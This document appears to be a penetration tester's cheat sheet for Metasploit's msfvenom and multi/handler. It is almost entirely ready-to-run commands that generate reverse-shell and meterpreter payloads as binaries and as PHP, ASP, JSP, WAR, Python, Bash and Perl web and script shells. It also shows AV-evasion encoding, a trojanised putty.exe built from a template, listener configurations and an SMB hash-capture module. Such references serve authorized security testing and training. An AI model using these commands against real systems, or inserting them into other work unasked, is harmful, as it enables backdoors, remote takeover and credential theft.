MSFVenom

    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       <architecture>  The architecture to use
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
        --payload-options            List the payload's standard options
    -o, --out   <path>               Save the payload
    -v, --var-name <name>            Specify a custom variable name to use for certain output formats
    -h, --help                       Show this message
        --help-formats               List available formats

Listing Modules

List payloads:

msfvenom -l payloads

List encoders:

msfvenom -l encoders

List payload options:

msfvenom -p [payload] --payload-options

Examples

Linux Binaries:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows Binaries (plain, encoded, with bad characters excluded, and injected into a template):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f dll -o pentestlab.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -o met_reverse_tcp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe -i 5 -e x86/shikata_ga_nai -o mal.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 --platform Windows -f exe --bad-chars '\x00\x0A\x0D' -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f exe -a x86 --platform windows -x putty.exe -k -e x86/shikata_ga_nai -i 5 --bad-chars '\x00\x0A\x0D' -o putty1.exe

PHP Web Payloads:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.php

ASP Web Payloads:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f asp > shell.asp

JSP Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f raw > shell.jsp

WAR Web Payloads:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f war > shell.war

Python Scripting Payloads:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.100.3 LPORT=44444 -f raw > shell.py

BASH Scripting Payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.100.3 LPORT=44444 -f raw > shell.sh

Perl Scripting Payloads:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.100.3 LPORT=44444 -f raw > shell.pl

Handlers

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

msf > use exploit/multi/handler
msf exploit(handler) > setg PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
set LHOST 10.11.0.159
set LPORT 4343
LPORT => 4343
setg SHELL cmd.exe
exploit -j -z

set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
set prompt %T S:%S J:%J
setg VERBOSE true

use auxiliary/server/capture/smb
set JOHNPWFILE john.txt
run

use multi/handler
set payload windows/meterpreter/reverse_tcp
setg LHOST 0.0.0.0
set SSL true
set LPORT 5667
setg AutoLoadStdapi true
setg AutoSystemInfo true
setg ExitOnSession false
setg EnableStageEncoding true
exploit -j -z

set payload windows/x64/meterpreter/reverse_tcp
set lport 5666
setg lhost 0.0.0.0
set payload windows/meterpreter/reverse_winhttps
set LPORT 443
set HandlerSSLCert /opt/CERT.pem
set IgnoreUnknownPayloads true
set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun.rc'
set StagerVerifySSLCert true
exploit -j -z

setg Exe::CUSTOM /opt/ConsoleApp4.exe
set payload windows/meterpreter/reverse_tcp
set LPORT 5666
set HandlerSSLCert /opt/CERT.pem
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set AutoRunScript 'post/multi/gather/run_console_rc_file RESOURCE=/opt/autorun1.rc'
exploit -j -z